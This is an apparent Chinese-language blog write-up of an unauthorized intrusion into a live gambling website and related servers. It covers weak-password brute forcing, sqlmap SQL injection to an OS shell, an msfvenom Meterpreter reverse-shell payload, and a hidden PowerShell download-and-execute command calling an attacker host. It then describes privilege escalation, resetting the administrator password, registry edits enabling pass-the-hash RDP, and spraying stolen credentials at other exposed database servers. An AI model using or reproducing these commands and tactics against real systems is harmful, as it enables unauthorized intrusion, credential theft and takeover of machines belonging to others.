前言

閑著無(wú)聊，網(wǎng)上隨便找了一個(gè)菠菜進(jìn)行簡(jiǎn)單測(cè)試，并做筆記記錄，大佬們輕噴，有什么不足之處請(qǐng)指教。

弱口令

訪問(wèn)網(wǎng)站就是一個(gè)登錄頁(yè)面，沒有驗(yàn)證碼直接bp開啟，成功爆出弱口令admin/123456，直接進(jìn)入后臺(tái)。

sql注入獲取權(quán)限

翻看了很多功能點(diǎn)，在一處功能點(diǎn)發(fā)現(xiàn)上傳接口，并嘗試上傳文件，發(fā)現(xiàn)無(wú)法上傳，加了白名單。直接選擇放棄，繼續(xù)尋找。在某一個(gè)/GroupMember.aspx?gid=參數(shù)上加上單引號(hào)，直接報(bào)錯(cuò)，SQL注入這不就來(lái)了么。

說(shuō)干就干，直接SQLMAP

發(fā)現(xiàn)為MSSQL，且DBA權(quán)限，直接--os-shell

上線msf

已經(jīng)獲取普通權(quán)限，接下來(lái)就是上線msf提權(quán)。msf生成powershell腳本，并放置在網(wǎng)站目錄下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

Vps開啟監(jiān)聽

使用powershell上線session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

如果想要通過(guò)url拼接堆疊執(zhí)行powershell會(huì)存在一個(gè)問(wèn)題，就是單引號(hào)閉合問(wèn)題。我們可以通過(guò)對(duì)powershell進(jìn)行編碼一下，這樣就可以繞過(guò)單引號(hào)的問(wèn)題。下面推薦一個(gè)不錯(cuò)的網(wǎng)站。

https://r0yanx.com/tools/java_exec_encode/

提權(quán)

session已經(jīng)上線，接下來(lái)目標(biāo)就是獲取system權(quán)限。很幸運(yùn)直接getsystem可以獲取system權(quán)限。如果需要提權(quán)推薦土豆家族提權(quán)，實(shí)戰(zhàn)中成功率很高，影響的服務(wù)器版本也很多。

遷移一下進(jìn)程，防止進(jìn)程掉線。

遠(yuǎn)程登錄服務(wù)器

發(fā)現(xiàn)服務(wù)器開啟3389端口，因?yàn)槭莝ystem權(quán)限，且為2012系統(tǒng)，大于2008版本都是無(wú)法抓到明文密碼，直接修改adminnistrator密碼。（實(shí)戰(zhàn)中不推薦直接修改管理員密碼）

利用hash遠(yuǎn)程登錄管理員賬號(hào)

因?yàn)槭莣in2012無(wú)法獲取明文密碼，直接修改管理員密碼稍有些不妥。嘗試通過(guò)獲取管理員NTLM遠(yuǎn)程登錄機(jī)器。（并非同一臺(tái)，這只是提供一個(gè)思路）

使用hash遠(yuǎn)程登錄RDP，需要開啟"Restricted Admin Mode"

// 開啟Restricted Admin mode
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f


// 查看是否已開啟，0x0則表示開啟
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

成功利用hash遠(yuǎn)程管理員桌面

其他

前期發(fā)現(xiàn)1433端口開放著，尋找數(shù)據(jù)庫(kù)配置文件，登錄數(shù)據(jù)庫(kù)。

通過(guò)fofa找了一下，資產(chǎn)還是挺多的，且很多都開放1433端口，猜測(cè)會(huì)存在同一個(gè)人部署的網(wǎng)站，嘗試用獲取的密碼對(duì)這些資產(chǎn)的1433端口進(jìn)行爆破，成功撞到幾臺(tái)數(shù)據(jù)庫(kù)，且都是sa權(quán)限。結(jié)束。

審核編輯：黃飛